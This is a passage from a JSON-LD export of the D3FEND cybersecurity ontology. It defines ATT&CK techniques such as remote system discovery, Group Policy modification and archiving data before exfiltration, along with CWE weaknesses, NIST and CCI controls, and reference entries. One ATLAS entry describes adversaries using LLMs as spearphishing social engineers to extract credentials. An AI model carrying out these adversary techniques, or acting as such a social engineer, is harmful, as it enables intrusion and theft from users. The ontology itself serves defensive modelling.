      "rdfs:label": "Reference - CAR-2019-08-002: Active Directory Dumping via NTDSUtil - MITRE"
    },
    {
      "@id": "d3f:T1083",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:accesses": [
        {
          "@id": "d3f:Directory"
        },
        {
          "@id": "d3f:File"
        }
      ],
      "d3f:attack-id": "T1083",
      "d3f:definition": "Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from [File and Directory Discovery](https://attack.mitre.org/techniques/T1083) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.",
      "rdfs:label": "File and Directory Discovery",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:DiscoveryTechnique"
        },
        {
          "@id": "_:Nedc0a4720be146cf8c09417eabdd51b3"
        },
        {
          "@id": "_:Nc43a3e69df42480ba80bd94a2ae49f34"
        }
      ]
    },
    {
      "@id": "_:Nedc0a4720be146cf8c09417eabdd51b3",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:accesses"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:Directory"
      }
    },
    {
      "@id": "_:Nc43a3e69df42480ba80bd94a2ae49f34",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:accesses"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:File"
      }
    },
    {
      "@id": "d3f:DigitalEventRecord",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "A digital event record is a structured representation of a digital event, encapsulating all relevant details about the occurrence for storage, analysis, and response. These records serve as the primary artifacts for cybersecurity operations, enabling threat detection, forensic investigations, and compliance reporting. Digital event records include metadata such as timestamps, origin, context, and associated resources, ensuring traceability and actionable intelligence in digital ecosystems.",
      "d3f:records": {
        "@id": "d3f:DigitalEvent"
      },
      "rdfs:label": "Digital Event Record",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:Record"
        },
        {
          "@id": "_:Neb48929158e1490ea1a8945c7a2167de"
        }
      ]
    },
    {
      "@id": "_:Neb48929158e1490ea1a8945c7a2167de",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:records"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:DigitalEvent"
      }
    },
    {
      "@id": "d3f:T1191",
      "@type": "owl:Class",
      "d3f:attack-id": "T1191",
      "d3f:definition": "The Microsoft Connection Manager Profile Installer (CMSTP.exe) is a command-line program used to install Connection Manager service profiles. (Citation: Microsoft Connection Manager Oct 2009) CMSTP.exe accepts an installation information file (INF) as a parameter and installs a service profile leveraged for remote access connections.",
      "owl:deprecated": true,
      "rdfs:comment": "This technique has been revoked by T1218.003",
      "rdfs:label": "CMSTP",
      "rdfs:seeAlso": {
        "@id": "d3f:T1218.003"
      },
      "rdfs:subClassOf": [
        {
          "@id": "d3f:DefenseEvasionTechnique"
        },
        {
          "@id": "d3f:ExecutionTechnique"
        }
      ]
    },
    {
      "@id": "d3f:connected-to",
      "@type": "owl:ObjectProperty",
      "d3f:definition": "x connected-to y: The subject x shares a direct physical or logical link with object y such that communication is possible between them without intermediate routing.",
      "rdfs:label": "connected-to",
      "rdfs:subPropertyOf": {
        "@id": "d3f:associated-with"
      }
    },
    {
      "@id": "d3f:Reference-FileEncryption101SafeguardingYourSensitiveData",
      "@type": [
        "owl:NamedIndividual",
        "d3f:InternetArticleReference"
      ],
      "d3f:has-link": {
        "@type": "xsd:anyURI",
        "@value": "https://www.veritas.com/information-center/file-encryption"
      },
      "d3f:kb-abstract": "File encryption is a security method that converts your files into ciphertext or unreadable data. By using this method, you may be sure that even if unauthorized people access your files, they won't be able to understand the contents without the decryption key.",
      "d3f:kb-author": "Veritas",
      "d3f:kb-reference-of": {
        "@id": "d3f:FileEncryption"
      },
      "d3f:kb-reference-title": "File Encryption 101: Safeguarding Your Sensitive Data",
      "rdfs:label": "Reference - File Encryption 101: Safeguarding Your Sensitive Data"
    },
    {
      "@id": "d3f:Reference-CAR-2021-01-008%3ADisableUAC_MITRE",
      "@type": [
        "owl:NamedIndividual",
        "d3f:ExternalKnowledgeBase"
      ],
      "d3f:has-link": {
        "@type": "xsd:anyURI",
        "@value": "https://car.mitre.org/analytics/CAR-2021-01-008/"
      },
      "d3f:kb-abstract": "Threat actors often, after compromising a machine, try to disable User Account Control (UAC) to escalate privileges. This is often done by changing the registry key for system policies using “reg.exe”, a legitimate tool provided by Microsoft for modifying the registry via command prompt or scripts. This action interferes with UAC and may enable a threat actor to escalate privileges on the compromised system, thereby allowing further exploitation of the system.",
      "d3f:kb-author": "MITRE",
      "d3f:kb-organization": "MITRE",
      "d3f:kb-reference-of": {
        "@id": "d3f:ProcessSpawnAnalysis"
      },
      "d3f:kb-reference-title": "CAR-2021-01-008: Disable UAC",
      "rdfs:label": "Reference - CAR-2021-01-008: Disable UAC - MITRE"
    },
    {
      "@id": "d3f:MailServer",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "Within the Internet email system, a message transfer agent or mail transfer agent (MTA) or mail relay is software that transfers electronic mail messages from one computer to another using SMTP. The terms mail server, mail exchanger, and MX host are also used in some contexts. Messages exchanged across networks are passed between mail servers, including any attached data files (such as images, multimedia or documents). These servers also often keep mailboxes for email. Access to this email by end users is typically either via webmail or an email client.",
      "d3f:runs": {
        "@id": "d3f:MessageTransferAgent"
      },
      "rdfs:isDefinedBy": {
        "@id": "dbr:Message_transfer_agent"
      },
      "rdfs:label": "Mail Server",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:Server"
        },
        {
          "@id": "_:N8e1303cb8d1a4d738f366bf9b9f50481"
        }
      ],
      "skos:altLabel": [
        "Email Server Resource",
        "MTA",
        "MX Host",
        "Mail Exchanger",
        "Mail transfer agent",
        "Message transfer agent"
      ]
    },
    {
      "@id": "_:N8e1303cb8d1a4d738f366bf9b9f50481",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:runs"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:MessageTransferAgent"
      }
    },
    {
      "@id": "d3f:Grid-CNN",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:d3fend-id": "D3A-GC",
      "d3f:definition": "A class of neural networks that specializes in processing data that has a grid-like topology, such as an image.",
      "d3f:kb-article": "## References\nTalukdar, P. (2020, June 10). Convolutional Neural Networks Explained. Towards Data Science. [Link](https://towardsdatascience.com/convolutional-neural-networks-explained-9cc5188c4939)",
      "rdfs:label": "Grid-CNN",
      "rdfs:subClassOf": {
        "@id": "d3f:ConvolutionalNeuralNetwork"
      }
    },
    {
      "@id": "d3f:CWE-408",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-408",
      "d3f:definition": "The product allows an entity to perform a legitimate but expensive operation before authentication or authorization has taken place.",
      "rdfs:label": "Incorrect Behavior Order: Early Amplification",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:CWE-405"
        },
        {
          "@id": "d3f:CWE-696"
        }
      ]
    },
    {
      "@id": "d3f:RemoteResource",
      "@type": "owl:Class",
      "d3f:definition": "In computing, a remote resource is a computer resource made available from one host to other hosts on a computer network. It is a device or piece of information on a computer that can be remotely accessed from another computer, typically via a local area network or an enterprise intranet.",
      "rdfs:label": "Remote Resource",
      "rdfs:seeAlso": {
        "@id": "d3f:NetworkResource"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:Resource"
      }
    },
    {
      "@id": "d3f:CWE-162",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-162",
      "d3f:definition": "The product receives input from an upstream component, but it does not neutralize or incorrectly neutralizes trailing special elements that could be interpreted in unexpected ways when they are sent to a downstream component.",
      "rdfs:label": "Improper Neutralization of Trailing Special Elements",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-138"
      }
    },
    {
      "@id": "d3f:ProcessSuspension",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual",
        "d3f:ProcessSuspension"
      ],
      "d3f:d3fend-id": "D3-PS",
      "d3f:definition": "Suspending a running process on a computer system.",
      "d3f:kb-article": "## How it works\n\nA running process might be suspended to mitigate its immediate effects if it is exhibiting anomalous, unauthorized, or malicious behavior. Defenders may choose to suspend rather than terminate to analyze the process first and resume the process if deemed benign.\n\n### System-provided functions\n\n#### Windows tools\nIn Windows, the `PsSuspend` command line utility from the SysInternals Suite provides functionality to suspend processes on a local or remote system.",
      "d3f:kb-reference": {
        "@id": "d3f:Reference-PsSuspend"
      },
      "d3f:suspends": {
        "@id": "d3f:Process"
      },
      "rdfs:label": "Process Suspension",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:ProcessEviction"
        },
        {
          "@id": "_:N532d37f70f734a0ca0217456804b44ef"
        }
      ]
    },
    {
      "@id": "_:N532d37f70f734a0ca0217456804b44ef",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:suspends"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:Process"
      }
    },
    {
      "@id": "d3f:CWE-1229",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-1229",
      "d3f:definition": "The product manages resources or behaves in a way that indirectly creates a new, distinct resource that can be used by attackers in violation of the intended policy.",
      "rdfs:label": "Creation of Emergent Resource",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-664"
      }
    },
    {
      "@id": "d3f:CCI-002607_v2022-04-05",
      "@type": [
        "owl:NamedIndividual",
        "d3f:CCIControl"
      ],
      "d3f:contributor": {
        "@id": "d3f:DISA_FSO"
      },
      "d3f:definition": "The organization installs security-relevant firmware updates within an organization-defined time period of the release of the updates.",
      "d3f:member-of": {
        "@id": "d3f:CCICatalog_v2022-04-05"
      },
      "d3f:narrower": {
        "@id": "d3f:SoftwareUpdate"
      },
      "d3f:published": {
        "@type": "xsd:dateTime",
        "@value": "2013-07-11T00:00:00"
      },
      "rdfs:label": "CCI-002607"
    },
    {
      "@id": "d3f:CWE-1022",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-1022",
      "d3f:definition": "The web application produces links to untrusted external sites outside of its sphere of control, but it does not properly prevent the external site from modifying security-critical properties of the window.opener object, such as the location property.",
      "d3f:synonym": "tabnabbing",
      "rdfs:label": "Use of Web Link to Untrusted Target with window.opener Access",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-266"
      }
    },
    {
      "@id": "d3f:authenticates",
      "@type": "owl:ObjectProperty",
      "d3f:definition": "x authenticates y: The subject x establishes the authenticity of some y. This relation indicates an authentication event has occurred.",
      "rdfs:isDefinedBy": {
        "@id": "http://wordnet-rdf.princeton.edu/id/01980375-s"
      },
      "rdfs:label": "authenticates",
      "rdfs:subPropertyOf": [
        {
          "@id": "d3f:associated-with"
        },
        {
          "@id": "d3f:hardens"
        }
      ]
    },
    {
      "@id": "d3f:ATTACKMobileDefenseEvasionTechnique",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:enables": {
        "@id": "d3f:TA0030"
      },
      "rdfs:label": "Defense Evasion Technique - ATTACK Mobile",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:ATTACKMobileTechnique"
        },
        {
          "@id": "_:N371fca4bc2cb4d44be7db144576a1f8c"
        }
      ],
      "skos:prefLabel": "Defense Evasion Technique"
    },
    {
      "@id": "_:N371fca4bc2cb4d44be7db144576a1f8c",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:enables"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:TA0030"
      }
    },
    {
      "@id": "d3f:FileShareService",
      "@type": "owl:Class",
      "d3f:definition": "A file sharing service (or file share service) provides the ability to share data across a network.",
      "rdfs:label": "File Share Service",
      "rdfs:seeAlso": {
        "@id": "dbr:File_sharing"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:NetworkService"
      }
    },
    {
      "@id": "d3f:ATLASPrivilegeEscalationTechnique",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:enables": {
        "@id": "d3f:AML.TA0012"
      },
      "rdfs:label": "Privilege Escalation Technique - ATLAS",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:ATLASTechnique"
        },
        {
          "@id": "_:Nca081de180ab47e9934ab447d8cf3b76"
        }
      ],
      "skos:prefLabel": "Privilege Escalation Technique"
    },
    {
      "@id": "_:Nca081de180ab47e9934ab447d8cf3b76",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:enables"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:AML.TA0012"
      }
    },
    {
      "@id": "d3f:SuspendProcess",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:suspends": {
        "@id": "d3f:Process"
      },
      "rdfs:label": "Suspend Process",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:SystemCall"
        },
        {
          "@id": "_:Na83fe2b292724711aeacd75bac9594fd"
        }
      ]
    },
    {
      "@id": "_:Na83fe2b292724711aeacd75bac9594fd",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:suspends"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:Process"
      }
    },
    {
      "@id": "d3f:LinuxWritev",
      "@type": "owl:Class",
      "d3f:definition": "Write data into multiple buffers.",
      "rdfs:isDefinedBy": {
        "@id": "https://man7.org/linux/man-pages/man2/writev.2.html"
      },
      "rdfs:label": "Linux Writev",
      "rdfs:subClassOf": {
        "@id": "d3f:OSAPIWriteFile"
      }
    },
    {
      "@id": "d3f:T1650",
      "@type": "owl:Class",
      "d3f:attack-id": "T1650",
      "d3f:definition": "Adversaries may purchase or otherwise acquire an existing access to a target system or network. A variety of online services and initial access broker networks are available to sell access to previously compromised systems.(Citation: Microsoft Ransomware as a Service)(Citation: CrowdStrike Access Brokers)(Citation: Krebs Access Brokers Fortune 500) In some cases, adversary groups may form partnerships to share compromised systems with each other.(Citation: CISA Karakurt 2022)",
      "rdfs:label": "Acquire Access",
      "rdfs:subClassOf": {
        "@id": "d3f:ResourceDevelopmentTechnique"
      }
    },
    {
      "@id": "d3f:Reference-SecurityVulnerabilityInformationAggregation",
      "@type": [
        "owl:NamedIndividual",
        "d3f:PatentReference"
      ],
      "d3f:has-link": {
        "@type": "xsd:anyURI",
        "@value": "https://patents.google.com/patent/US8544098B2"
      },
      "d3f:kb-abstract": "Security vulnerability information aggregation techniques are disclosed. Vulnerability information associated with one or more security vulnerabilities is obtained from multiple sources and aggregated into respective unified vulnerability definitions for the one or more security vulnerabilities. Aggregation may involve format conversion, content aggregation, or both in some embodiments. Unified vulnerability definitions may be distributed to vulnerability information consumers in accordance with consumer-specific policies. Storage of vulnerability information received from the sources may allow the aggregation process to be performed on existing vulnerability information “retro-actively”. Related data structures and Graphical User Interfaces (GUIs) are also disclosed.",
      "d3f:kb-author": "Christophe Gustave, Stanley Taihai Chow, Douglas Wiemer",
      "d3f:kb-organization": "Nokia Technologies Oy",
      "d3f:kb-reference-of": {
        "@id": "d3f:AssetVulnerabilityEnumeration"
      },
      "d3f:kb-reference-title": "Security vulnerability information aggregation",
      "rdfs:label": "Reference - Security vulnerability information aggregation"
    },
    {
      "@id": "d3f:AML.T0052.000",
      "@type": "owl:Class",
      "d3f:attack-id": "AML.T0052.000",
      "d3f:definition": "Adversaries may turn LLMs into targeted social engineers.\nLLMs are capable of interacting with users via text conversations.\nThey can be instructed by an adversary to seek sensitive information from a user and act as effective social engineers.\nThey can be targeted towards particular personas defined by the adversary.\nThis allows adversaries to scale spearphishing efforts and target individuals to reveal private information such as credentials to privileged systems.",
      "rdfs:label": "Spearphishing via Social Engineering LLM - ATLAS",
      "rdfs:seeAlso": {
        "@id": "https://atlas.mitre.org/techniques/AML.T0052.000"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:AML.T0052"
      },
      "skos:prefLabel": "Spearphishing via Social Engineering LLM"
    },
    {
      "@id": "d3f:T1416",
      "@type": "owl:Class",
      "d3f:attack-id": "T1416",
      "d3f:definition": "Adversaries may register Uniform Resource Identifiers (URIs) to intercept sensitive data.",
      "owl:deprecated": true,
      "rdfs:comment": "This technique has been revoked by T1635.001",
      "rdfs:label": "URI Hijacking - ATTACK Mobile",
      "rdfs:seeAlso": {
        "@id": "d3f:T1635.001"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:ATTACKMobileCredentialAccessTechnique"
      },
      "skos:prefLabel": "URI Hijacking"
    },
    {
      "@id": "d3f:T1018",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:attack-id": "T1018",
      "d3f:definition": "Adversaries may attempt to get a listing of other systems by IP address, hostname, or other logical identifier on a network that may be used for Lateral Movement from the current system. Functionality could exist within remote access tools to enable this, but utilities available on the operating system could also be used such as  [Ping](https://attack.mitre.org/software/S0097) or <code>net view</code> using [Net](https://attack.mitre.org/software/S0039).",
      "d3f:may-access": {
        "@id": "d3f:OperatingSystemConfigurationFile"
      },
      "d3f:may-invoke": [
        {
          "@id": "d3f:CreateProcess"
        },
        {
          "@id": "d3f:CreateSocket"
        }
      ],
      "d3f:produces": {
        "@id": "d3f:NetworkTraffic"
      },
      "rdfs:label": "Remote System Discovery",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:DiscoveryTechnique"
        },
        {
          "@id": "_:N6f8be91ed9d548718fb82dde44951001"
        },
        {
          "@id": "_:N24648fce8c5249a5961cad03f2d2ea92"
        },
        {
          "@id": "_:N650c232e2be14340af53ac010733e6af"
        },
        {
          "@id": "_:N64d810e057d345b5ada268da67ac8ef4"
        }
      ]
    },
    {
      "@id": "_:N6f8be91ed9d548718fb82dde44951001",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:may-access"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:OperatingSystemConfigurationFile"
      }
    },
    {
      "@id": "_:N24648fce8c5249a5961cad03f2d2ea92",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:may-invoke"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:CreateProcess"
      }
    },
    {
      "@id": "_:N650c232e2be14340af53ac010733e6af",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:may-invoke"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:CreateSocket"
      }
    },
    {
      "@id": "_:N64d810e057d345b5ada268da67ac8ef4",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:produces"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:NetworkTraffic"
      }
    },
    {
      "@id": "d3f:T1496.001",
      "@type": "owl:Class",
      "d3f:attack-id": "T1496.001",
      "d3f:definition": "Adversaries may leverage the compute resources of co-opted systems to complete resource-intensive tasks, which may impact system and/or hosted service availability.",
      "rdfs:label": "Compute Hijacking",
      "rdfs:subClassOf": {
        "@id": "d3f:T1496"
      }
    },
    {
      "@id": "d3f:TA0109",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual",
        "d3f:OffensiveTactic"
      ],
      "rdfs:label": "Lateral Movement - ATTACK ICS",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:ATTACKICSTactic"
        },
        {
          "@id": "d3f:OffensiveTactic"
        }
      ],
      "skos:prefLabel": "Lateral Movement"
    },
    {
      "@id": "d3f:CWE-99",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-99",
      "d3f:definition": "The product receives input from an upstream component, but it does not restrict or incorrectly restricts the input before it is used as an identifier for a resource that may be outside the intended sphere of control.",
      "d3f:synonym": "Insecure Direct Object Reference",
      "rdfs:label": "Improper Control of Resource Identifiers ('Resource Injection')",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-74"
      }
    },
    {
      "@id": "d3f:FQDNDomainName",
      "@type": [
        "owl:NamedIndividual",
        "d3f:DomainName"
      ],
      "rdfs:label": "FQDN Domain Name"
    },
    {
      "@id": "d3f:CWE-913",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-913",
      "d3f:definition": "The product does not properly restrict reading from or writing to dynamically-managed code resources such as variables, objects, classes, attributes, functions, or executable instructions or statements.",
      "rdfs:label": "Improper Control of Dynamically-Managed Code Resources",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-664"
      }
    },
    {
      "@id": "d3f:SMBFileOpenEvent",
      "@type": "owl:Class",
      "d3f:definition": "An event where a file is opened if it exists, failing otherwise. This operation is used to access or query the existing file.",
      "rdfs:label": "SMB File Open Event",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:SMBEvent"
        },
        {
          "@id": "_:Na9f6c78f15a642ff9da85f1de22b5ef2"
        }
      ]
    },
    {
      "@id": "_:Na9f6c78f15a642ff9da85f1de22b5ef2",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:preceded-by"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:SMBFileCreateEvent"
      }
    },
    {
      "@id": "d3f:Reference-MethodAndApparatusForUtilizingATokenForResourceAccess_RsaSecurityInc.",
      "@type": [
        "owl:NamedIndividual",
        "d3f:PatentReference"
      ],
      "d3f:has-link": {
        "@type": "xsd:anyURI",
        "@value": "https://patents.google.com/patent/US5657388A/en"
      },
      "d3f:kb-abstract": "A method and apparatus for utilizing a token which is preferably a \"dumb token\" to provide secure access by authorized users to a selected resource. The token stores a secret user code in machine readable form, which code is read by a token processor. The token processor also receives a time-varying value and an algorithm, both of which may be stored or generated at either the token or the token processor and preferably a secret personal identification code which may be inputted at the token, but is preferably inputted at the token processor. The secret user code, time-varying value and secret personal identification code are then algorithmically combined by the algorithm, preferably in the token processor, to generate a one-time nonpredictable code which is transmitted to a host processor. The host processor utilizes the received one-time nonpredictable code to determine if the user is authorized access to the resource and grants access to the resource if the user is determined to be authorized. The system may be modified to operate in query/response mode. The token processor may be any of a variety of available portable remote processors or may be a device such as a telephone which is equipped with card or other token reader and with processing capability.",
      "d3f:kb-author": "Kenneth P. Weiss",
      "d3f:kb-mitre-analysis": "",
      "d3f:kb-organization": "Rsa Security Inc.",
      "d3f:kb-reference-of": {
        "@id": "d3f:Multi-factorAuthentication"
      },
      "d3f:kb-reference-title": "Method and apparatus for utilizing a token for resource access",
      "rdfs:label": "Reference - Method and apparatus for utilizing a token for resource access - Rsa Security Inc."
    },
    {
      "@id": "d3f:T1027.013",
      "@type": "owl:Class",
      "d3f:attack-id": "T1027.013",
      "d3f:definition": "Adversaries may encrypt or encode files to obfuscate strings, bytes, and other specific patterns to impede detection. Encrypting and/or encoding file content aims to conceal malicious artifacts within a file used in an intrusion. Many other techniques, such as [Software Packing](https://attack.mitre.org/techniques/T1027/002), [Steganography](https://attack.mitre.org/techniques/T1027/003), and [Embedded Payloads](https://attack.mitre.org/techniques/T1027/009), share this same broad objective. Encrypting and/or encoding files could lead to a lapse in detection of static signatures, only for this malicious content to be revealed (i.e., [Deobfuscate/Decode Files or Information](https://attack.mitre.org/techniques/T1140)) at the time of execution/use.",
      "rdfs:label": "Encrypted/Encoded File",
      "rdfs:subClassOf": {
        "@id": "d3f:T1027"
      }
    },
    {
      "@id": "d3f:T1560",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:attack-id": "T1560",
      "d3f:creates": {
        "@id": "d3f:ArchiveFile"
      },
      "d3f:definition": "An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network.(Citation: DOJ GRU Indictment Jul 2018) Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.",
      "rdfs:label": "Archive Collected Data",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:CollectionTechnique"
        },
        {
          "@id": "_:N45852c76811a4f2e9a49a90695a9a452"
        }
      ]
    },
    {
      "@id": "_:N45852c76811a4f2e9a49a90695a9a452",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:creates"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:ArchiveFile"
      }
    },
    {
      "@id": "d3f:NIST_SP_800-53_R5_AC-2_9",
      "@type": [
        "owl:NamedIndividual",
        "d3f:NISTControl"
      ],
      "d3f:control-name": "Account Management | Restrictions on Use of Shared and Group Accounts",
      "d3f:member-of": {
        "@id": "d3f:NIST_SP_800-53_R5"
      },
      "d3f:narrower": {
        "@id": "d3f:UserAccountPermissions"
      },
      "rdfs:label": "AC-2(9)"
    },
    {
      "@id": "d3f:Reference-OSQueryWindowsUserCollectionCode",
      "@type": [
        "owl:NamedIndividual",
        "d3f:SourceCodeReference"
      ],
      "d3f:has-link": {
        "@type": "xsd:anyURI",
        "@value": "https://github.com/osquery/osquery/blob/d2be385d71f401c85872f00d479df8f499164c5a/osquery/tables/system/windows/users.cpp"
      },
      "d3f:kb-reference-title": "OS Query Windows User Collection Code",
      "rdfs:label": "Reference - OS Query Windows User Collection Code"
    },
    {
      "@id": "d3f:CWE-696",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-696",
      "d3f:definition": "The product performs multiple related behaviors, but the behaviors are performed in the wrong order in ways which may produce resultant weaknesses.",
      "rdfs:label": "Incorrect Behavior Order",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-691"
      }
    },
    {
      "@id": "d3f:RD-0002.03",
      "@type": "owl:Class",
      "d3f:attack-id": "RD-0002.03",
      "d3f:definition": "By compromising another operator’s spacecraft, or a hosted payload, an adversary can gain proximity, sensing, and relay capabilities that are costly to build from scratch and difficult to attribute. With control of an on-orbit asset, the actor may conduct local spectrum measurement and traffic analysis, attempt selective interference or spoofing at short range, or probe crosslinks and gateways where payload networks bridge to buses. In rideshare or hosted-payload contexts, weak segmentation and shared ground paths can provide insight into neighboring missions. More aggressive scenarios include remote proximity operations (RPO) to achieve advantageous geometry; however, physical grappling, docking, or exposure of debug/test interfaces is highly specialized and rare, with significant safety, legal, and tracking implications. Realistic attacker goals emphasize adjacency for RF leverage, covert relay, or data theft rather than mechanical capture.",
      "rdfs:label": "3rd-Party Spacecraft - SPARTA",
      "rdfs:seeAlso": {
        "@id": "https://sparta.aerospace.org/technique/RD-0002/03/"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:RD-0002"
      },
      "skos:prefLabel": "3rd-Party Spacecraft"
    },
    {
      "@id": "d3f:CWE-144",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-144",
      "d3f:definition": "The product receives input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could be interpreted as line delimiters when they are sent to a downstream component.",
      "rdfs:label": "Improper Neutralization of Line Delimiters",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-140"
      }
    },
    {
      "@id": "d3f:T1448",
      "@type": "owl:Class",
      "d3f:attack-id": "T1448",
      "d3f:definition": "A malicious app may trigger fraudulent charges on a victim’s carrier billing statement in several different ways, including SMS toll fraud and SMS shortcodes that make purchases.",
      "owl:deprecated": true,
      "rdfs:comment": "This technique has been revoked by T1643",
      "rdfs:label": "Carrier Billing Fraud - ATTACK Mobile",
      "rdfs:seeAlso": {
        "@id": "d3f:T1643"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:ATTACKMobileImpactTechnique"
      },
      "skos:prefLabel": "Carrier Billing Fraud"
    },
    {
      "@id": "d3f:FreeMemory",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:deletes": {
        "@id": "d3f:MemoryBlock"
      },
      "rdfs:label": "Free Memory",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:SystemCall"
        },
        {
          "@id": "_:N204ac892bc24411d89ef426b5de67d6e"
        }
      ]
    },
    {
      "@id": "_:N204ac892bc24411d89ef426b5de67d6e",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:deletes"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:MemoryBlock"
      }
    },
    {
      "@id": "d3f:ATLASTechnique",
      "@type": "owl:Class",
      "d3f:definition": "An ATLAS Technique is an action conducted by adversaries to accomplish tactical goals within the context of artificial intelligence systems. These techniques articulate both 'how' adversaries execute these actions to reach their objectives and 'what' outcomes are achieved from these maneuvers.",
      "rdfs:label": "ATLAS Technique",
      "rdfs:seeAlso": {
        "@id": "https://atlas.mitre.org/techniques"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:ATLASThing"
      }
    },
    {
      "@id": "d3f:T1484.001",
      "@type": "owl:Class",
      "d3f:attack-id": "T1484.001",
      "d3f:definition": "Adversaries may modify Group Policy Objects (GPOs) to subvert the intended discretionary access controls for a domain, usually with the intention of escalating privileges on the domain. Group policy allows for centralized management of user and computer settings in Active Directory (AD). GPOs are containers for group policy settings made up of files stored within a predictable network path `\\<DOMAIN>\\SYSVOL\\<DOMAIN>\\Policies\\`.(Citation: TechNet Group Policy Basics)(Citation: ADSecurity GPO Persistence 2016)",
      "rdfs:label": "Group Policy Modification",
      "rdfs:subClassOf": {
        "@id": "d3f:T1484"
      }
    },
    {
      "@id": "d3f:EmailAttachment",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:attached-to": {
        "@id": "d3f:Email"
      },
      "d3f:definition": "An email attachment is a computer file sent along with an email message. One or more files can be attached to any email message, and be sent along with it to the recipient. This is typically used as a simple method to share documents and images.",
      "rdfs:isDefinedBy": {
        "@id": "dbr:Email_attachment"
      },
      "rdfs:label": "Email Attachment",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:DocumentFile"
        },
        {
          "@id": "_:N431dce6d332c48d3a3b225a742043330"
        }
      ]
    },
    {
      "@id": "_:N431dce6d332c48d3a3b225a742043330",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:attached-to"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:Email"
      }
    },
    {
      "@id": "d3f:CWE-151",
      "@type": "owl:Class",
